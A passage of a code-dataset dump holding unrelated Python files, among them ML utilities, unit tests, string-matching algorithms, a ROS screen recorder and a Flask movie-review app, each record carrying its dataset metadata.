parser.add_argument(\"--correlation\",\n dest=\"correlation\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the correlation of features\")\n parser.add_argument(\"--create-classification-task\",\n dest=\"create_folds\",\n action=\"store_true\",\n default=False,\n help=argparse.SUPPRESS)\n parser.add_argument(\"--create-verification-task\",\n dest=\"create_verification_task\",\n action=\"store_true\",\n default=False,\n help=argparse.SUPPRESS)\n parser.add_argument(\"--count-users\",\n dest=\"count_users\",\n action=\"store_true\",\n default=False,\n help=\"Count how many different users have created \"\n \"the dataset\")\n parser.add_argument(\"--analyze-cm\",\n dest=\"cm\",\n default=False,\n help=\"Analyze a confusion matrix in JSON format.\")\n return parser\n\n\nif __name__ == \"__main__\":\n args = _get_parser().parse_args()\n if args.verify:\n if args.dataset is None:\n logging.error(\"--dataset needs to be set for --verify\")\n sys.exit()\n _verify_all(args.dataset)\n if args.overview:\n img_src = _load_csv(args.dataset)\n create_random_overview(img_src, x_images=10, y_images=10)\n if args.analyze_color:\n _get_color_statistics(csv_filepath=args.dataset)\n if args.class_distribution:\n _analyze_class_distribution(csv_filepath=args.dataset,\n max_data=1000,\n bin_size=25)\n if args.pca:\n _analyze_pca(csv_filepath=args.dataset)\n if args.distances:\n _analyze_distances(csv_filepath=args.dataset)\n if args.variance:\n _analyze_variance(csv_filepath=args.dataset)\n if args.correlation:\n _analyze_correlation(csv_filepath=args.dataset)\n if args.create_folds:\n _create_stratified_split(args.dataset, int(args.create_folds))\n if args.count_users:\n _count_users(csv_filepath=args.dataset)\n if args.create_verification_task:\n _create_verification_task()\n if args.cm:\n 
_analyze_cm(args.cm)\n","sub_path":"hasy_tools.py","file_name":"hasy_tools.py","file_ext":"py","file_size_in_byte":46316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416252371","text":"from setuptools import setup\n\n# Doing it as suggested here:\n# https://packaging.python.org/guides/single-sourcing-package-version/\n# (number 3)\n\nversion = {}\nwith open(\"mala/version.py\") as fp:\n exec(fp.read(), version)\n\nsetup(\n name=\"mala\",\n version=version[\"__version__\"],\n description=\"Framework for Electronic Structure Learning\",\n url=\"https://gitlab.com/hzdr/mala/mala\",\n author=\"Lenz Fiedler\",\n author_email=\"l.fiedler@hzdr.de\",\n license=\"MIT\",\n packages=[\"mala\"],\n zip_safe=False,\n install_requires=open('requirements.txt').read().splitlines(),\n python_requires='<3.9',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84276379","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/5/18 20:57\n# @Author : pf_xu\n# @FileName: symmetric-tree.py\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef isSymmetric(root):\n\n def check(node1, node2):\n if not node1 and not node2:\n return True\n elif not node1 or not node2:\n return False\n\n if node1.val != node2.val:\n return False\n else:\n return check(node1.left, node2.right) and check(node1.right, node2.left)\n return check(root, root)\n\n\nif __name__ == '__main__':\n root = TreeNode(1)\n root.left = TreeNode(2)\n root.right = TreeNode(2)\n root.left.left = TreeNode(3)\n root.left.right = TreeNode(4)\n root.right.left = TreeNode(4)\n root.right.right = TreeNode(3)\n 
print(isSymmetric(root))\n","sub_path":"101-200/101/symmetric-tree.py","file_name":"symmetric-tree.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"476195981","text":"import os, sys, os.path as op\nsys.path.insert(0, os.path.join(os.getenv('CITY_PATH'), 'src'))\nimport random\nimport logging\nimport sqlite3\nimport shutil\nimport unittest\nfrom learning.video2dataset import video2dataset, exportVideo\nfrom learning.helperImg import ProcessorRandom, ProcessorVideo\nfrom learning.helperDb import imageField, createDb\n\n\nclass TestVideo (unittest.TestCase):\n\n def setUp (self):\n self.imgProcessor = ProcessorRandom ({'dims': (240,352), 'relpath': '.'})\n\n conn = sqlite3.connect(':memory:') # in RAM\n createDb(conn)\n self.conn = conn\n\n def tearDown(self):\n if os.path.exists('testdata/video/test'): shutil.rmtree ('testdata/video/test')\n self.conn.close()\n\n\n def test_video2database_wrongTimeFormat (self):\n c = self.conn.cursor()\n\n video_path = 'testdata/video/cam119.avi'\n time_path = 'testdata/video/wrongtime.txt'\n params = {'relpath': '.'}\n with self.assertRaises(Exception): \n video2dataset (c, video_path, video_path, time_path, '', params)\n\n\n def test_video2database (self):\n c = self.conn.cursor()\n\n video_path = 'testdata/video/cam119.avi'\n time_path = 'testdata/video/cam119.txt'\n params = {'relpath': '.'}\n video2dataset (c, video_path, video_path, time_path, 'test', params)\n\n c.execute ('SELECT * FROM images')\n image_entries = c.fetchall()\n self.assertEqual (len(image_entries), 3)\n imagefile0 = imageField(image_entries[0], 'imagefile')\n imagefile2 = imageField(image_entries[2], 'imagefile')\n maskfile0 = imageField(image_entries[0], 'maskfile')\n maskfile2 = imageField(image_entries[2], 'maskfile')\n width = imageField(image_entries[0], 'width')\n height = imageField(image_entries[0], 'height')\n self.assertEqual (imagefile0, 
'testdata/video/cam119/000000')\n self.assertEqual (imagefile2, 'testdata/video/cam119/000002')\n self.assertEqual (maskfile0, 'testdata/video/cam119/000000')\n self.assertEqual (maskfile2, 'testdata/video/cam119/000002')\n self.assertEqual (width, 352)\n self.assertEqual (height, 240)\n\n\nclass TestExportVideo (unittest.TestCase):\n \n def setUp (self):\n self.conn = sqlite3.connect(':memory:') # in RAM\n createDb(self.conn)\n c = self.conn.cursor()\n\n s = 'images(imagefile,width,height)'\n v = ('testdata/Cassini/images/000000.jpg',100,100)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Cassini/images/000001.jpg',100,100)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000000.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000001.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n v = ('testdata/Moon/images/000002.jpg',120,80)\n c.execute('INSERT INTO %s VALUES (?,?,?)' % s, v)\n\n s = 'cars(id,imagefile,name,x1,y1,width,height,score)'\n v = (1,'testdata/Cassini/images/000000.jpg','sedan',24,42,6,6,1)\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n v = (2,'testdata/Cassini/images/000000.jpg','truck',44,52,20,15,0.5) # default ratio\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n v = (3,'testdata/Cassini/images/000001.jpg','truck',24,42,16,16,0.1)\n c.execute('INSERT INTO %s VALUES (?,?,?,?,?,?,?,?)' % s, v)\n\n def tearDown (self):\n if op.exists('testdata/Cassini/imwrite.avi'): os.remove('testdata/Cassini/imwrite.avi')\n if op.exists('testdata/Moon/imwrite.avi'): os.remove('testdata/Moon/imwrite.avi')\n\n\n def test_exportVideo (self):\n c = self.conn.cursor()\n image_processor = ProcessorVideo \\\n ({'relpath': '.', \n 'out_dataset': {'testdata/Cassini/images.avi': 'testdata/Cassini/imwrite.avi',\n 'testdata/Moon/images.avi': 'testdata/Moon/imwrite.avi'}\n })\n exportVideo (c, {'image_processor': image_processor, 
'relpath': '.'})\n\n # TODO: check the videos\n\n\nif __name__ == '__main__':\n logging.basicConfig (level=logging.ERROR)\n unittest.main()","sub_path":"test/learning/test_video2dataset.py","file_name":"test_video2dataset.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"375692714","text":"#-------------------------------------------------------------------------------\n#\n# Project: EOxServer \n# Authors: Martin Paces \n# Fabian Schindler \n#\n#-------------------------------------------------------------------------------\n# Copyright (C) 2014 EOX IT Services GmbH\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \n# copies of the Software, and to permit persons to whom the Software is \n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies of this Software or works derived from this Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#-------------------------------------------------------------------------------\n\nfrom optparse import make_option\nfrom itertools import product\n\nfrom django.core.management.base import CommandError, BaseCommand\n\nfrom eoxserver.resources.coverages import models\nfrom eoxserver.resources.coverages.management.commands import (\n CommandOutputMixIn, _variable_args_cb, nested_commit_on_success\n)\n\n\nclass Command(CommandOutputMixIn, BaseCommand):\n option_list = BaseCommand.option_list + (\n make_option(\"-c\", \"--collection\", dest=\"collection_ids\",\n action='callback', callback=_variable_args_cb,\n default=None, help=(\"Collection(s) in which the \"\n \"objects shall be inserted.\")\n ), \n make_option(\"-a\", \"--add\", dest=\"add_ids\",\n action='callback', callback=_variable_args_cb,\n default=None, help=(\"List of the to be inserted \"\n \"eo-objects.\")\n ), \n make_option('--ignore-missing-collection',\n dest='ignore_missing_collection',\n action=\"store_true\", default=False,\n help=(\"Optional. Proceed even if the linked parent \"\n \"does not exist. By defualt, a missing parent \" \n \"will terminate the command.\")\n ),\n make_option('--ignore-missing-object',\n dest='ignore_missing_object',\n action=\"store_true\", default=False,\n help=(\"Optional. Proceed even if the linked child \"\n \"does not exist. By defualt, a missing child \" \n \"will terminate the command.\")\n ),\n )\n\n args = (\n \"--collection [ ...] \"\n \"--add [--add ...] \"\n \"[--ignore-missing-collection] [--ignore-missing-object]\"\n )\n \n help = \"\"\"\n Link (insert) one or more EOObjects into one or more dataset series. 
\n Pre-existing links are ignored.\n \"\"\"\n\n @nested_commit_on_success\n def handle(self, *args, **kwargs):\n # check the required inputs\n collection_ids = kwargs.get('collection_ids', None)\n add_ids = kwargs.get('add_ids', None)\n if not collection_ids: \n raise CommandError(\n \"Missing the mandatory collection identifier(s)!\"\n )\n\n if not add_ids: \n raise CommandError(\n \"Missing the mandatory identifier(s) for to be inserted \"\n \"objects.\"\n )\n\n # extract the collections \n ignore_missing_collection = kwargs['ignore_missing_collection']\n collections = [] \n for collection_id in collection_ids: \n try: \n collections.append(\n models.Collection.objects.get(identifier=collection_id)\n )\n except models.Collection.DoesNotExist: \n msg = (\n \"There is no Collection matching the given \"\n \"identifier: '%s'\" % collection_id\n )\n if ignore_missing_collection: \n self.print_wrn(msg)\n else: \n raise CommandError(msg) \n\n # extract the children \n ignore_missing_object = kwargs['ignore_missing_object']\n objects = [] \n for add_id in add_ids: \n try:\n objects.append(\n models.EOObject.objects.get(identifier=add_id)\n )\n except models.EOObject.DoesNotExist:\n msg = (\n \"There is no EOObject matching the given identifier: '%s'\"\n % add_id\n )\n if ignore_missing_object:\n self.print_wrn(msg)\n else:\n raise CommandError(msg)\n \n try:\n for collection, eo_object in product(collections, objects):\n # check whether the link does not exist\n if eo_object not in collection:\n self.print_msg(\n \"Linking: %s <--- %s\" % (collection, eo_object)\n )\n collection.insert(eo_object)\n\n else:\n self.print_wrn(\n \"Collection %s already contains %s\" \n % (collection, eo_object)\n )\n\n except Exception as e:\n self.print_traceback(e, kwargs)\n raise CommandError(\"Linking failed: %s\" % 
(e))\n","sub_path":"eoxserver/resources/coverages/management/commands/eoxs_collection_link.py","file_name":"eoxs_collection_link.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"389866273","text":"#!/usr/bin/env python3\n\nimport os\nimport rospy\nimport rospkg\nimport cv2\nimport pyautogui\nimport numpy as np\nfrom time import sleep\nfrom time import perf_counter\n\nimport gi\ngi.require_version('Gdk', '3.0')\nfrom gi.repository import Gdk\n\nclass Screen_Record:\n def __init__(self):\n rospy.init_node('pioneer_screen_record', anonymous=False)\n rospy.loginfo(\"[SS] Pioneer Wolf Screen Record - Running\")\n rospack = rospkg.RosPack()\n self.data_path = rospack.get_path(\"pioneer_main\") + \"/data/wolf_walk\"\n\n sleep(2)\n n_folder = len(os.walk(self.data_path).__next__()[1]) - 1\n data_path = \"{}/{}\".format(self.data_path, n_folder)\n cam_file = \"{}/wolf_screen_cam-{}.avi\" .format(data_path, n_folder)\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n\n s = Gdk.Screen.get_default()\n # screen_size = (s.get_width(), s.get_height())\n screen_size = (1920, s.get_height())\n self.out = cv2.VideoWriter(cam_file, fourcc, 30.0, screen_size)\n self.main_rate = rospy.Rate(30)\n\n def run(self):\n while not rospy.is_shutdown():\n img = pyautogui.screenshot()\n frame = np.array(img)\n # print(frame.shape)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n self.out.write(frame)\n\n # ch = 0xFF & cv2.waitKey(1)\n # if ch == 27:\n # break\n self.main_rate.sleep()\n\n self.out.release()\n\nif __name__ == '__main__':\n ss = Screen_Record()\n ss.run()","sub_path":"PIONEER-ROBOT/pioneer_vision/scripts/wolf_vision/screen_recording.py","file_name":"screen_recording.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652074974","text":"import re\nimport sys\nimport os\nimport 
json\n\n'''\nMAIN FUNCTION\n'''\ndef kmp(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n index = 0\n for string in list_of_posts:\n # Append the result based on spam or not\n if (search_kmp(string.lower(), keywords.lower())):\n list_of_status[index] = True\n else:\n list_of_status[index] = False\n index += 1\n\n return list_of_status\n\n\ndef regular_expression(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n # Split the pattern to each character to insert .*\n pat_split = list(keywords.lower())\n pattern = \"\"\n\n # Generate pattern from keyword inserting .* to each char\n for i in range(len(pat_split)):\n pattern += (\".*\" + pat_split[i])\n pattern += \".*\"\n\n # Compile pattern into regex pattern\n regex = re.compile(pattern)\n \n index = 0\n for string in list_of_posts:\n # Append the result based on spam or not\n if (regex.match(string.lower())):\n list_of_status[index] = True\n else: \n list_of_status[index] = False\n index += 1\n \n return list_of_status\n\ndef boyer_moore(list_of_posts, keywords):\n # Status that hold the string is spam or not\n list_of_status = {}\n\n index = 0\n for string in list_of_posts:\n # Set string and keywords to lower case\n bm = search_occurence(string.lower(), keywords.lower())\n\n # Append the result based on spam or not\n if (bm != -1):\n list_of_status[index].append(True)\n else:\n list_of_status[index].append(False)\n index += 1\n\n return list_of_status\n\n'''\nHELPER FUNCTION\n'''\n\ndef search_kmp(text, word):\n # Create index table\n idx_table = []\n idx_table.append(0)\n j = 0\n cont = False\n \n # Searching word while appending to index table\n for i in range(1, len(word) - 1):\n if (word[i] == word[j]):\n j += 1\n cont = True\n else:\n cont = False\n if (not(cont)):\n j = 0\n idx_table.append(j)\n\n idx = 0\n found = False\n j = 0\n\n # Iterate until finding matching or at the end of text\n while (idx < len(text) 
and not found):\n if (text[idx] == word[j]):\n j += 1\n if (j == len(word)):\n found = True\n else:\n if (j > 0):\n j = idx_table[j-1]\n idx -= 1\n idx += 1\n \n return found\n\ndef generate_last_occurence(string, size):\n # Set all number of chars to be -1\n last = [-1] * 128\n \n # Fill the actual value of last occurence\n for i in range(size):\n last[ord(string[i])] = i\n \n \t# Return last occurence list\n return last\n \ndef search_occurence(text, pattern):\n\t# Store the pattern and text length\n pat_length = len(pattern)\n txt_length = len(text)\n \n # Create the last character list\n last = generate_last_occurence(pattern, pat_length) \n \n shifted = 0\t\n while (shifted <= txt_length - pat_length):\n \t# Last idx for backward iteration\n j = pat_length - 1\n \n \t\t# Keep reducing j while text still matched pattern\n while (j >= 0 and pattern[j] == text[shifted + j]):\n j -= 1\n \n # Get the matching between pattern and text\n if j < 0:\n return shifted\n\n else:\n # Shift depend on it's availability in list\n shifted += max(1, j - last[ord(text[shifted + j])])\n\n # Return -1 when didn't find any match\n return -1\n\nif __name__ == '__main__':\n\n with open(\"post.json\") as f:\n list_of_posts = json.loads(f.read())\n f.close()\n\n with open(\"command.txt\") as fc:\n command = fc.readline()\n fc.close()\n\n with open(\"keyword.txt\") as fk:\n keyword = fk.readline()\n fk.close()\n\n if (command == \"bm\"):\n json_out = kmp(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))\n elif (command == \"regex\"):\n json_out = regular_expression(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))\n else:\n json_out = kmp(list_of_posts, keyword)\n print(json.JSONEncoder().encode(json_out))","sub_path":"algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"359079830","text":"import unittest\nfrom 
collect_fractions import validate_values,collect_fractions,LCM,check_zero_denominator,check_fraction_length_bigger_than_required,check_fraction_length_lower_than_required\n\nclass TestValidateValues(unittest.TestCase):\n def test_input_if_it_is_given_as_tuple_of_tuples(self):\n exc = None\n try:\n validate_values(((1,2),(3,4)))\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Passed fractions are not in the form of a list of tuples')\n\n def test_input_if_it_is_given_as_dictionary_of_tuples(self):\n exc = None\n try:\n validate_values({1:2,3:4})\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Passed fractions are not in the form of a list of tuples')\n\n def test_input_if_there_are_more_than_two_fractions(self):\n exc = None\n try:\n validate_values([(1,2),(3,4),(5,6)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'More than 2 fractions are being passed for the program to collect')\n\n def test_input_if_there_is_fraction_with_more_than_two_elements(self):\n exc = None\n try:\n validate_values([(1,2),(3,4,5)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'There is a fraction with more than two elements')\n\n def test_input_if_there_is_fraction_with_less_than_two_elements(self):\n exc = None\n try:\n validate_values([(1,2),(3,)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'There is a fraction with less than two elements')\n\n\n def test_input_if_there_is_a_fraction_whose_denominator_is_zero(self):\n exc = None\n try:\n validate_values([(1,0),(2,3)])\n except Exception as err:\n exc = err\n\n self.assertIsNotNone(exc)\n self.assertEqual(str(exc),'Second element of one of the fractions is zero - cannot divide by zero!!!')\n\nclass TestLCM(unittest.TestCase):\n def test_LCM_with_zero(self):\n fract = (0,99)\n 
first,second = fract\n self.assertEqual(0,LCM(first,second))\n \n def test_LCM_with_negative_number(self):\n fract = (-12,28)\n first,second = fract\n self.assertEqual(-84,LCM(first,second))\n\nclass TestCollectFractions(unittest.TestCase):\n def test_collecting_of_fractions_when_no_need_of_simplifying(self):\n result = collect_fractions([(1,2),(1,3)])\n self.assertEqual(result,(5,6))\n\n def test_collecting_of_fractions_when_there_is_need_of_simplifying(self):\n result = collect_fractions([(1,2),(2,10)])\n self.assertEqual(result,(7,10))\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Week2/test_collect_fractions.py","file_name":"test_collect_fractions.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"635104973","text":"import logging\nimport os\nfrom pony import orm\nfrom publ import model, config\n\nlogging.basicConfig(level=logging.INFO)\n\nconfig.database_config['filename'] = os.path.join(os.getcwd(), 'test.db')\n\nmodel.setup()\n\nwith orm.db_session:\n cat = model.Category.get(category='test')\n if not cat:\n print(\"creating anew\")\n cat = model.Category(\n category='test', file_path='path', sort_name='asdfadsf')\n orm.commit()\n\n print(cat.category, cat.file_path, cat.sort_name)\n\n blank = model.Category.get(category='')\n if not blank:\n print(\"making fresh\")\n blank = model.Category(category='', file_path='blah', sort_name='asdf')\n","sub_path":"tests/schemaTest.py","file_name":"schemaTest.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"228530537","text":"from .util import format_currency\nfrom ..base import PAWTBase\n\n\nclass Invoice(PAWTBase):\n def __init__(self, tg, data):\n super().__init__(tg)\n\n self.title = data[\"title\"]\n self.description = data[\"description\"]\n self.start_parameter = data[\"start_parameter\"]\n 
self.currency = data[\"currency\"]\n self.total_amount = data[\"total_amount\"]\n\n self._cached_cost = None\n\n def __repr__(self):\n return \"\".format(self.title)\n\n def __str__(self):\n return \"{} ({})\".format(self.title, self.format_cost())\n\n def format_cost(self):\n if not self._cached_cost:\n self._cached_cost = format_currency(\n self.currency, self.total_amount, self._tg\n )\n return self._cached_cost\n","sub_path":"pawt/models/message_specials/invoice.py","file_name":"invoice.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"468536054","text":"# -*- coding: utf-8 -*-\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass MultiLayerCNN(nn.Module):\n def __init__(self, vocab_size, embedding_dim, max_seq_len,\n label_size, embeddings=None, requires_grad=True):\n super().__init__()\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n self.max_seq_len = max_seq_len\n self.requires_grad = requires_grad\n self.embeddings = embeddings\n self.label_size = label_size\n self.embed = nn.Embedding(vocab_size + 1, embedding_dim)\n\n if embeddings != None:\n self.embed.weight = nn.Parameter(\n embeddings, requires_grad=requires_grad)\n\n self.conv1 = nn.Sequential(\n nn.Conv1d(max_seq_len, 256, kernel_size=7, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, stride=3)\n )\n\n self.conv2 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=7, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, stride=3)\n )\n\n self.conv3 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv4 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv5 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU()\n )\n\n self.conv6 = nn.Sequential(\n nn.Conv1d(256, 256, kernel_size=3, stride=1),\n nn.ReLU(),\n nn.MaxPool1d(kernel_size=3, 
stride=3)\n )\n\n self.fc = nn.Linear(256*7, label_size)\n\n def forward(self, x):\n x = self.embed(x) # dim: (batch_size, max_seq_len, embedding_size)\n x = self.conv1(x)\n x = self.conv2(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv5(x)\n x = self.conv6(x)\n x = x.view(x.size(0), -1)\n x = self.fc(x)\n\n return F.log_softmax(x)\n","sub_path":"texion/models/torch/multilayercnn.py","file_name":"multilayercnn.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"55753673","text":"from app import app\nimport movies\nimport users\nimport reviews\nimport suggestions\nimport categories\nfrom flask import redirect, render_template, request\n\n@app.route(\"/\", methods = [\"GET\", \"POST\"])\ndef main():\n if request.method == \"GET\":\n\t movie_list = movies.get_movie_list()\n\t return render_template(\"main.html\", movies=movie_list)\n\n if request.method == \"POST\":\n sort=request.form.get(\"sort\")\n if sort == \"newest\":\n movie_list=movies.get_movie_list_newest()\n elif sort == \"oldest\":\n movie_list=movies.get_movie_list_oldest()\n elif sort == \"best\":\n movie_list=movies.get_movie_list_best()\n elif sort == \"worst\":\n movie_list=movies.get_movie_list_worst()\n elif sort == \"latest\":\n movie_list = movies.get_movie_list()\n else:\n movie_list = movies.get_movie_list()\n return render_template(\"main.html\", movies=movie_list)\n\n@app.route(\"/login\", methods=[\"POST\"])\ndef login():\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if users.login(username, password):\n return redirect(\"/\")\n else:\n return render_template(\"login_issue.html\")\n\n@app.route(\"/logout\")\ndef logout():\n users.logout()\n return redirect(\"/\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"GET\":\n return render_template(\"make_account.html\")\n \n if request.method == 
\"POST\":\n username = request.form[\"username\"]\n password = request.form[\"password\"]\n if users.username_exists_already(username):\n return render_template (\"register_error.html\", message=\"Käyttäjätunnus on varattu.\")\n if len(username) >= 20 or len(username) <= 1:\n return render_template(\"register_error.html\", message=\"Käyttäjätunnuksen täytyy olla 1-20 merkkiä.\")\n if password == \"\":\n return render_template(\"register_error.html\", message=\"Salasana on tyhjä.\")\n \n if users.register(username,password):\n return redirect(\"/\")\n else:\n return render_template(\"register_error.html\", message=\"Uuden tunnuksen luonti epäonnistui.\")\n\n@app.route(\"/movie_page/\", methods=[\"GET\", \"POST\"])\ndef movie_page(id):\n if request.method == \"GET\":\n if not movies.get_movie_info(id):\n return render_template(\"issue.html\", message=\"Valitettavasti elokuvaa ei löytynyt.\")\n info = movies.get_movie_info(id)\n review_list = reviews.get_reviews(id)\n amount_of_reviews = reviews.get_amount(id)\n average= reviews.get_average(id)\n return render_template(\"movie_page.html\", information=info,reviews=review_list, amount_of_reviews=amount_of_reviews, average=average, id=id)\n if request.method == \"POST\":\n users.check_csrf()\n movie_id=request.form[\"movie_id\"]\n grade = int(request.form[\"grade\"])\n review = request.form[\"review\"]\n if grade == 0 or grade == 1 or grade == 2 or grade == 3 or grade == 4 or grade == 5 or grade == 6 or grade == 7 or grade == 8 or grade == 9 or grade == 10:\n if not reviews.create_review(movie_id, grade, review):\n return render_template(\"review_issue.html\", message=\"Arvostelun lisäys ei onnistunut\", id=id)\n else:\n return redirect(\"/movie_page/\"+ str(movie_id))\n return render_template(\"review_issue.html\", message=\"Arvostelussa pitää olla ainakin arvosana.\", id=id)\n \n\n@app.route(\"/my_reviews\")\ndef my_reviews():\n mine = reviews.get_my_reviews()\n number_of_reviews = reviews.get_number_of_reviews()\n 
return render_template(\"my_reviews.html\", mine=mine, number_of_reviews=number_of_reviews)\n\n@app.route(\"/suggest_movies\")\ndef suggest_movies():\n return render_template(\"suggest_movies.html\")\n\n@app.route(\"/new_suggestion\", methods=[\"POST\"])\ndef new_suggestion():\n users.check_csrf()\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 177:\n return render_template(\"suggestion_error.html\", message=\"Elokuvan nimi pitää olla 1-177 merkkiä.\")\n year=request.form[\"year\"]\n if len(year) != 4:\n return render_template(\"suggestion_error.html\", message=\"Vuosiluvussa pitää olla 4 numeroa\")\n if int(year) > 2021:\n return render_template(\"suggestion_error.html\", message=\"Julkaisu vuosi ei voi olla uudempi kuin 2021\")\n genres=request.form[\"genre\"]\n if genres == \"\":\n return render_template(\"suggestion_error.html\", message=\"Elokuvalla pitää olla edes yksi genre\")\n description=request.form[\"description\"]\n if description == \"\":\n return render_template(\"suggestion_error.html\", message=\"Elokuvalla pitää olla kuvaus\")\n leading_roles=request.form[\"leading_roles\"]\n if leading_roles == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi päärooli\")\n\n if suggestions.make_suggestion(name, year, genres, description, leading_roles):\n return render_template(\"new_suggestion.html\")\n else:\n return render_template(\"suggestion_error.html\", message=\"Ehdotuksen lisääminen epäonnistui\")\n\n@app.route(\"/add_movie\", methods=[\"GET\",\"POST\"])\ndef add_movie():\n users.require_admin()\n if request.method == \"GET\":\n return render_template(\"add_movie.html\")\n if request.method == \"POST\":\n users.check_csrf()\n name = request.form[\"name\"]\n if len(name) < 1 or len(name) > 177:\n return render_template(\"add_movie_error.html\", message=\"Elokuvan nimi pitää olla 1-177 merkkiä.\")\n if movies.check_if_movie_exists(name):\n return render_template(\"add_movie_error.html\", 
message=\"Tämän niminen elokuva on jo olemassa.\")\n year = request.form[\"year\"]\n if len(year) != 4:\n return render_template(\"add_movie_error.html\", message=\"Vuosiluvussa pitää olla 4 numeroa\")\n if int(year) > 2021:\n return render_template(\"add_movie_error.html\", message=\"Julkaisu vuosi ei voi olla uudempi kuin 2021\")\n genres = request.form[\"genre\"]\n if genres == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi genre\")\n description = request.form[\"description\"]\n if description == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla kuvaus\")\n leading_roles = request.form[\"leading_roles\"]\n if leading_roles == \"\":\n return render_template(\"add_movie_error.html\", message=\"Elokuvalla pitää olla edes yksi päärooli\")\n\n if movies.add_movie(name,year,genres, description, leading_roles):\n return redirect (\"/\")\n else:\n return render_template(\"add_movie_error.html\", message=\"Elokuvan lisäys epäonnistui\")\n\n@app.route(\"/suggestions\")\ndef suggestion_page():\n users.require_admin()\n suggestion_list = suggestions.get_suggestions()\n number_of_suggestions = suggestions.get_number_of_suggestions()\n return render_template(\"suggestions.html\", suggestions=suggestion_list, number_of_suggestions=number_of_suggestions)\n \n@app.route(\"/accept\", methods=[\"POST\"])\ndef accept():\n users.require_admin()\n users.check_csrf()\n 